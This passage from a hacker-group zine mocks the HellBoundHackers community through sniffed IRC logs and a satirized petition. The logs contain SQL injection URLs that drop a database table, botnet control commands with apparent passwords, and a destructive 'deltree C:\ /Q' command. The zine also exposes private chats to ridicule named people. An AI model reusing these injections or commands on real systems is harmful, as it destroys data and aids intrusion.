192.168.1.133 : john -> #hbh : cheese is leet # cheese is a whitehat leech 192.168.1.133 : T-Metal -> #hbh : But I don't sit there googling with inurl keywords all day exploiting a single known exploit and calling myself leet. # Nah, he just ./'s 192.168.1.133 : RedCell -> #hbh : i'm in awe right now because of the leetness 192.168.1.133 : DosKey -> #hbh : I have proof i am leet. 192.168.1.133 : ReVoLT -> #hbh : i need some leet nix people on here 192.168.1.133 : wolfy -> #hbh : im leet nix person 192.168.1.133 : z3ro -> #hbh : tell him we want to bask in his leetness 192.168.1.133 : ReVoLT -> #hbh : because +v = very fucking leet 192.168.1.133 : Ingelo^ -> #hbh : Now i have +Very leet hacker ;D 192.168.1.133 : Caity -> #hbh : Yeah, I'm 'ta leet' one in my family. 192.168.1.133 : BlueYoshie -> #hbh : my sis is soo ta leet, i love her 192.168.1.133 : Stitchup -> #hbh : I am leet because i use linux # wolfmankurd, dilbert and pickle: the only 3 real hackers on the entire server 213.251.160.26 : local -> Dilbert : DROP TABLE pages;/* 213.251.160.26 : local -> Dilbert : lol 213.251.160.26 : Pickle -> wolfmankurd : 'lo 213.251.160.26 : Pickle -> wolfmankurd : so is that in php, or sql command line? 213.251.160.26 : Pickle -> wolfmankurd : yeah 213.251.160.26 : Pickle -> wolfmankurd : droping tables like that should work 213.251.160.26 : Pickle -> wolfmankurd : probably i think 213.251.160.26 : Pickle -> wolfmankurd : i don't know really, i don't know a lot about sql # That's obvious... 213.251.160.26 : Pickle -> wolfmankurd : maybe charcode 213.251.160.26 : Pickle -> wolfmankurd : :) 213.251.160.26 : Dilbert -> wolfmankurd : sweeet 213.251.160.26 : Dilbert -> wolfmankurd : only just noticed the act bar xD 213.251.160.26 : local -> Pickle : I sent it to dily DROP TABLE pages;/* 213.251.160.26 : local -> Pickle : injection 213.251.160.26 : local -> Pickle : article.php?id=-1%20UNION%20ALL%20SELECT%20NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20pages;DROP%20TABLE%20pages;-- 213.251.160.26 : local -> Pickle : although I could just do article.php?id=300;DROP%20TABLE%20pages;-- 213.251.160.26 : local -> Pickle : what ya think? 213.251.160.26 : local -> Pickle : why ma I getting incoorect syntax? 213.251.160.26 : local -> Pickle : 4.2.1 standard I think 213.251.160.26 : local -> Pickle : I think it's the ; 213.251.160.26 : local -> Pickle : yeah it' the ; :/ 213.251.160.26 : local -> Pickle : any way to get around it? 213.251.160.26 : local -> Pickle : useing a ; that is 213.251.160.26 : local -> Pickle : interesting http://bugs.mysql.com/bug.php?id=2339 213.251.160.26 : local -> Pickle : 213.251.160.26 : local -> Pickle : gay lol 213.251.160.26 : local -> Pickle : %3B 213.251.160.26 : local -> Pickle : oho mysql doesn't allow ; # Here we see a log from their elite private channel, #pokemon: 213.251.160.26 : Stitchup -> #pokemon : .[smiff 213.251.160.26 : Stitchup -> #pokemon : .psniff 213.251.160.26 : Stitchup -> #pokemon : .remove die 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : USA|XP|SP2|00|3200|W|0842 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : Stitchup -> #pokemon : remove die 213.251.160.26 : Stitchup -> #pokemon : .die 213.251.160.26 : Stitchup -> #pokemon : .logins die 213.251.160.26 : Stitchup -> #pokemon : .remove die 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : USA|XP|SP2|00|3200|W|0842 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : Stitch -> #pokemon : wtf 213.251.160.26 : local -> #pokemon : POKEMON 213.251.160.26 : ReVoLT -> #pokemon : POKEMON 213.251.160.26 : Stitch -> #pokemon : YES 213.251.160.26 : Stitch -> #pokemon : GOT TO 213.251.160.26 : Stitch -> #pokemon : CATCH THEM ALLLLLLLLLLLLLLLL 213.251.160.26 : local -> #pokemon : LET ME SHOW YOU MY POKEMANS 213.251.160.26 : ReVoLT -> #pokemon : LET ME SHOW YOU MY POKEMANS 213.251.160.26 : Stitch -> #pokemon : weeeeeee 213.251.160.26 : Stitch -> #pokemon : okej 213.251.160.26 : Stitch -> #pokemon : okej 213.251.160.26 : Stitch -> #pokemon : Now 213.251.160.26 : Stitch -> #pokemon : .logins 09011105010 213.251.160.26 : local -> #pokemon : nzm (irc.plg) �� Password accepted. 213.251.160.26 : local -> #pokemon : nzm (irc.plg) �� Password accepted. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : nzm (irc.plg) �� Pa ssword accepted. 213.251.160.26 : USA|XP|SP2|00|1325|L|8495 -> #pokemon : nzm (irc.plg) �� Pa ssword accepted. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : nzm (irc.plg) �� Pa ssword accepted. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : nzm (irc.plg) �� Pa ssword accepted. 213.251.160.26 : Stitch -> #pokemon : :) 213.251.160.26 : Stitch -> #pokemon : See 213.251.160.26 : local -> #pokemon : lol 213.251.160.26 : ReVoLT -> #pokemon : lol 213.251.160.26 : Stitch -> #pokemon : It's got exploit scanning + spread ing 213.251.160.26 : local -> #pokemon : heh 213.251.160.26 : DJDD^Lap -> #pokemon : heh 213.251.160.26 : local -> #pokemon : .logins 09011105010 213.251.160.26 : ReVoLT -> #pokemon : .logins 09011105010 213.251.160.26 : Silent_Paws -> #pokemon : POKEMANS 213.251.160.26 : local -> #pokemon : :( 213.251.160.26 : ReVoLT -> #pokemon : :( 213.251.160.26 : Silent_Paws -> #pokemon : oh hey 213.251.160.26 : Stitch -> #pokemon : Also host auth 213.251.160.26 : Silent_Paws -> #pokemon : there are LIES here 213.251.160.26 : Stitch -> #pokemon : STFU OR DDOS # LOL 213.251.160.26 : Stitch -> #pokemon : Anyways 213.251.160.26 : Stitch -> #pokemon : I was tryna add in vnc scanning 213.251.160.26 : Stitch -> #pokemon : And auto rooting 213.251.160.26 : Stitch -> #pokemon : But it seems i fucked up 213.251.160.26 : Stitch -> #pokemon : .remove die 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : USA|XP|SP2|00|1325|L|8495 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : local -> #pokemon : heh 213.251.160.26 : DJDD^Lap -> #pokemon : heh 213.251.160.26 : Stitch -> #pokemon : .remove die 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : Stitch -> #pokemon : .remove die 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : Stitch -> #pokemon : .remove die 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : Stitch -> #pokemon : [SCAN]: Failed to start scan, no I P specified. 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : Stitch -> #pokemon : [SCAN]: Failed to start scan, no I P specified. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : Stitch -> #pokemon : .remove die 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : Stitch -> #pokemon : [SCAN]: Failed to start scan, no I P specified. 213.251.160.26 : Stitch -> #pokemon : [SCAN]: Failed to start scan, no I P specified. 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : USA|XP|SP2|00|1325|L|8495 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : local -> #pokemon : [SCAN]: Failed to start scan, no IP specif ied. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : USA|XP|SP2|00|1325|L|8495 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : USA|XP|SP0|00|3225|W|3911 -> #pokemon : [SCAN]: Failed to start scan, no IP specified. 213.251.160.26 : Stitch -> #pokemon : lol 213.251.160.26 : Stitch -> #pokemon : :) 213.251.160.26 : Stitch -> #pokemon : I fucked the remove command 213.251.160.26 : Stitch -> #pokemon : :D 213.251.160.26 : Stitch -> #pokemon : And the scanning doesn't work 213.251.160.26 : Stitch -> #pokemon : So 213.251.160.26 : Stitch -> #pokemon : I need you to tell me 213.251.160.26 : Stitch -> #pokemon : How to easily trash a windows box 213.251.160.26 : Stitch -> #pokemon : From cmd prompt 213.251.160.26 : Stitch -> #pokemon : :) 213.251.160.26 : Stitch -> #pokemon : And i'll do it 213.251.160.26 : Stitch -> #pokemon : And paste results 213.251.160.26 : local -> #pokemon : deltree C 213.251.160.26 : DJDD^Lap -> #pokemon : deltree C 213.251.160.26 : local -> #pokemon : lol 213.251.160.26 : ReVoLT -> #pokemon : lol 213.251.160.26 : local -> #pokemon : C:\ /Q 213.251.160.26 : DJDD^Lap -> #pokemon : C:\ /Q 213.251.160.26 : Stitch -> #pokemon : full command plox 213.251.160.26 : Stitch -> #pokemon : I can't be bothered to think about stuff 213.251.160.26 : local -> #pokemon : deltree C:\ /Q 213.251.160.26 : DJDD^Lap -> #pokemon : deltree C:\ /Q 213.251.160.26 : local -> #pokemon : that works...i know as ive done it :p 213.251.160.26 : DJDD^Lap -> #pokemon : that works...i know as ive done it :p 213.251.160.26 : Stitch -> #pokemon : deltree C:\ /Q 213.251.160.26 : Stitch -> #pokemon : ... 213.251.160.26 : Stitch -> #pokemon : C:\Documents and Settings\Sam Turk enitz>deltree C:\/Q 213.251.160.26 : Stitch -> #pokemon : operable program or batch file. 213.251.160.26 : Stitch -> #pokemon : fGt 213.251.160.26 : Raster -> #pokemon : bleh bots 213.251.160.26 : Stitch -> #pokemon : Wasn't me! 213.251.160.26 : Raster -> #pokemon : XD 213.251.160.26 : Stitch -> #pokemon : lol 213.251.160.26 : Stitch -> #pokemon : Morning 213.251.160.26 : Stitch -> #pokemon : :) 213.251.160.26 : local -> #pokemon : hmm...oh damn...i forgot XP doesntsupport deltree 213.251.160.26 : Raster -> #pokemon : Ive been around 213.251.160.26 : Stitch -> #pokemon : I see 213.251.160.26 : Stitch -> #pokemon : And i see 213.251.160.26 : Stitch -> #pokemon : Let me find some kind of virii tha t will just fuck the box 213.251.160.26 : Stitch -> #pokemon : I cba to play around with shit 213.251.160.26 : local -> #pokemon : .logins 09011105010 213.251.160.26 : local -> #pokemon : :( 213.251.160.26 : Pickle -> #pokemon : ha 213.251.160.26 : Pickle -> #pokemon : no it's the other pass 213.251.160.26 : Pickle -> #pokemon : hangon 213.251.160.26 : Pickle -> #pokemon : .bot.login JJyVffar3615 213.251.160.26 : Pickle -> #pokemon : nope 213.251.160.26 : Pickle -> #pokemon : [Sat Jun 16 2007] [17:17:35] .bot.login JJyVffar3615 213.251.160.26 : Pickle -> #pokemon : [Sat Jun 16 2007] [17:17:37] [M00 |XP|UNI]400341> 3main .bot - user logged in 213.251.160.26 : Pickle -> #pokemon : i'm thinking it's not the same bot 213.251.160.26 : local -> #pokemon : lol We have several hundred megs of sniffed IRC logs, but we don't want to bore you. HBH, your time is up. Accept this gracefully, and try to save whatever small public image you have left. But first take a look at this. It's hilarious. It's so bad it could easily be a prank. http://www.petitiononline.com/LLHBH/petition.html Might as well copy the text verbatim. ######################################## To: The FBI and SS Mr_Cheese, the loved admin of HellBoundHackers.org, is being arrested, for simply doing what he believed in, and being a 'True Hacker', sharing his knowledge with anyone who wanted to learn, and trying to do his part to make a difference in the world. Myself, along with many other loyal members of this website, are outraged. QUOTE FROM HELLBOUNDHACKERS.ORG: Mr_Cheese wrote: this is the hardest message i have ever had to write, and could most likely be my last ever post on HBH. im writing this message whilst struggeling to retain my tears. I have been dreading this day for my whole career. i love this site. i love what it has become. i love the members on it. Recent events have now caused me to give up "hacking", and soon give up HBH. As some of you know im having problems with the Secret Service. They have been investigating me for months now and even some members on HBH have been interevied by FBI agents. Someone i considered my friend, and thought i could trust has actually been working for the SS and been sending them every piece of information he had on me. He even hosted HBH for a while just so the he could relay information to the SS. Thank you danserv.co.uk betrayel is something i never forget. Secret Service also bugged/monitored the HBHCon and even arrested a member at the end of the day to get extra info. This member had his laptop coppied and room raided so they could gain extra info on me and HBH. My AIM / MSN conversations are being monitored and recorded, my internet activites are being watched. I am almost certain HBH is only on this current server because the SS are still investigating and allowing it to be up to gain further information on me. This isnt even 1/2 of everything that is going on right now. It is only a matter of very short time before i get arrested, and as soon as they have me in custody, there wont be a need for them to keep HBH online, so it will be taken down by Secret Service. The True Hacker is a dying breed, and im sadened to say there is no room left in this world for them. I mean no joke when i say my skills have enabled me to literally save lifes all over the world. Now, my skills mixed with my intense ethical stance on everything i do, has become a threat to the gouvernment. I've seen people deface and hack hundreds of sites for no ethical reason for the sole purpose of destroying it and attempting to become famous. Arent these people the real threat? These people have never done a ethical thing in their career, have never saved or even improved a single life via their skills, yet they dont get punished? i cant desribe how im feeling right now. im just a kid and chances are im going to jail. i love you all and will always remember you and everything everyone has ever done for HBH. i wish everyone the very very best with whatever they choose to do with their lifes. i only hope you can follow my example and make me proud. im so very very sorry. ________________ I know that the media has portrayed the image of a hacker to be malicious, dangerous, and unethical, however, this isn't the case with many of us, especially Mr_Cheese. As you can see from his above quote, and many other forum posts, he is very ethical, and is a 'True Hacker', one of a dying breed. The site, HellBound Hackers, is also probably going to be taken down. We've had a bit of trouble in the past, with people questioning the legality of our content, but let me - and this (http://www.hellboundhackers.org/isthislegal.php) page assure you - we are a completly legal site. We break no rules. We teach, we educate. We hope, that someday, there will be fairness in the world, and hackers will be not judged by the few that do wrong, but by the many who do right. Please, stop to think about this. Is this really fair? Should the FBI be arresting this teenager, simply because he has been steriotyped as bad? I don't think that's fair, and I'm sure that you'll agree too. Quoting a magnificant piece of text by a personal hero of mine - The Hacker Manifesto by The Mentor - '...Yes, I am a criminal. My frime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike. (from http://www.mithral.com/~beberg/manifesto.html) I know I can't do much about this, but quoting a fellow member on HBH - 'I'd rather die standing then live on my knees' - and that's what I'm fighting for. This is what I, and many other members, think is right, and we're fighting for it. How can the government want to arrest and bring down Mr_Cheese, when he's helping the internet far more than he is hurting it. I know that you're probably reading this, and thinking 'oh yeah, some random hacker kids. They don't matter, they're hackers, they just want my credit card number' or something. Well, I'd like to stop you there, and correct you. I may be a 'hacker', but I am certainly not what the media portrays me to be. I am not 'evil'. I do not hack and steal things. I do not deface sites just for the fun of it. I do not unleash viruses on the wild. I do not spend my spare time excecuting scripts on government websites. Instead, I fight for things that I believe in, like this. So, fellow members of HellBound Hackers, any other hackers, computer enthusiasts, programmers, security experts, and anyone else at all who believes this is unfair: please sign this, in the hope that, although we are just a minority, our words can be heard by the officials, and fairness can come into place. And lastly, LONG LIVE HBH! <3 sarah_briarmoss, on behalf of all members of HBH. Sincerely, The Undersigned ######################################## I can't wait to see them try to use this defence when Mr_Cheese is being prosecuted for defacing some webpage or something else as simple and illegal. <+Prosecutor> Mr_Cheese, so you actually admit to defacing the website in question and writing "Mr_Cheese owns j00!!", despite your not guilty plea? <+Mr_Cheese> YOU CAN'T JAIL ME, LONG LIVE TRUE HACKERS LONG LIVE FREEDOM These HBH morons don't have a clue about why Mr_Cheese is being investigated, so they assume it is just to crush powerful anti-establishment hackers. "The True Hacker is a dying breed, and im sadened to say there is no room left in this world for them. I mean no joke when i say my skills have enabled me to literally save lifes all over the world. Now, my skills mixed with my intense ethical stance on everything i do, has become a threat to the gouvernment." Who decided this wanker could call himself a "True Hacker"? Where did he save lives? How is he a threat to the government? <@Cheney> Mr. President, the world's last True Hacker, holding out against our anti-True Hacker campaign, has halted our path of destruction. He is saving children in Burma, Palestine, and Nigeria. <@Bush> His elite hacking skills have made him a threat to this very establishment which I rule over. He must be stopped. <@Cheney> Yes sir. Libby, bring me Captain Beria from the Secret Service. We have an assignment for him. "I've seen people deface and hack hundreds of sites for no ethical reason for the sole purpose of destroying it and attempting to become famous. Arent these people the real threat? These people have never done a ethical thing in their career, have never saved or even improved a single life via their skills, yet they dont get punished?" Have to start somewhere. Particularly with a moron who assumes his ethics stand true and that they thus justify his actions. "We've had a bit of trouble in the past, with people questioning the legality of our content, but let me - and this (http://www.hellboundhackers.org/isthislegal.php) page assure you - we are a completly legal site." < Lawyer> stfu noob < Lawyer> Whether or not the content the site hosts is illegal or not, Mr_Cheese will be charged with anything that HE has done to break the law. < Lawyer> The courts decide if he has broken the law, not you. < FBI> I'll take your gay wanker headquarters offline if I want to, I'm hosting it out of the goodness of my heart. I was there when Mr_Cheese needed me. "Please, stop to think about this. Is this really fair? Should the FBI be arresting this teenager, simply because he has been steriotyped as bad? I don't think that's fair, and I'm sure that you'll agree too." < FBI> Mr. President, we have found a True Hacker. <@Bush> Popular culture has taught me that hackers undermine our country with their anti-establishment tendencies and mirror sunglasses. Destroy him. "Quoting a magnificant piece of text by a personal hero of mine - The Hacker Manifesto by The Mentor [...]" (Way to misquote, bitch) < Mr_Cheese> MY CRIME IS THAT OF LEARNING. LEARNING HOW TO HACK BY DEFACING PEOPLE I DON'T AGREE WITH Let's make fun of some of the morons signing this online petition, shall we? 363. Preston Lynch He never did anything wrong < FBI> Our research disagrees. 355. jason knowlegde is power, if they won'tlet us learn we will struggle to survive until we are bring about self destruction. < FBI> TERRORIST 343. Darren HBH forever, if you attack one of us, all of us will attack you!!! < FBI> We await your onslaught. 332. Chris Mr_Cheese is everything I aspire to be. < FBI> LOL LOSER 308. Dominic It is not wise to arrest someone who is known so well. It happened with Mandella and Mr.Cheese will be no different be careful you might unleash the fury of a community of hackers. < FBI> Mr_Cheese will bring the end of our era of hacker apartheid. 282. xplicit-pki-raja@hotmail.com free mr_cheseeeee u fukin americans have no rites to invade policy so fuk u bush fuk u fbi fuk u SS fuk every one who h8tz MUslimz FUk u alllllllllllllllllllll < FBI> TERRORIST 256. Mike "Hi, nice site, visit my web site too! 226. Steve Why Break Something When It Scares You 217. syklops This is Kevin Mitnick all over again. 173. Simon Morris He is a GOD. He is a good man. I will stand by him forever < FBI> We think you bend over for him too. 156. 47th_snake Why do the good people always get the blame? 44. Charles HBH is my life. So there you go, HBH is full of morons. The site needs to die and anybody with a future will go somewhere else. Guess what? The word on the street is that the entire post by Mr_Cheese was a prank to get attention. If so, that adds an entire dimension of "lawl" to everything. EOHELLBOUNDHACKERS );} sub Contact_outro { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOF' The ZF03 staff can be contacted at superheroes(a)hushmail.com. Don't bother sending to that other address; it expired. :-D That's it for our entertainment today. We hope you enjoyed every bit of it. As for us, we are happy to get that out and relax. We'll be chillin' at the ZF0 mansion in Miami, hosting parties with Shaq. It's good to be on top. We're not the only group up there; we are just doing our small part in the losing battle to keep streets safe and alleys clear. The others know who they are. Be sure to check out anything else interesting that comes out. In all seriousness we will take some time off. Then we will be keeping to ourselves while auditing code and writing tools. We're taking it easy and we do not want shit from anyone. You got owned, move on, we don't need the sob story. Try to learn from the experience. This means that we will be giving another massive headstart on the CF0. Keep it real and keep hacking. EOF );}